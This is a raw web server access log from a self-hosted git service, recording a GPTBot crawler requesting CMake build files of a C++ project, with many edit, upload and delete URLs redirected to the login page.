AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:46:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:46:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:46:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 959] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:46:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:18:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:18:46:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:46:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:46:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:46:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:46:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:46:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:46:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:46:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11343] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:46:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9901] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:46:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:46:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 40257] [Gzip 13.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:46:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9864] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:46:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10124] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:46:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13931] [Gzip 4.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:46:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10133] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:46:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:46:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:46:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9859] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:46:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:46:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:46:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:46:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:46:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 19179] [Gzip 14.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:46:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9860] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:47:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:47:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:47:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 947] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9863] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:47:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 961] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:47:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:47:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:47:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:47:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:47:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13938] [Gzip 7.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:47:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10934] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 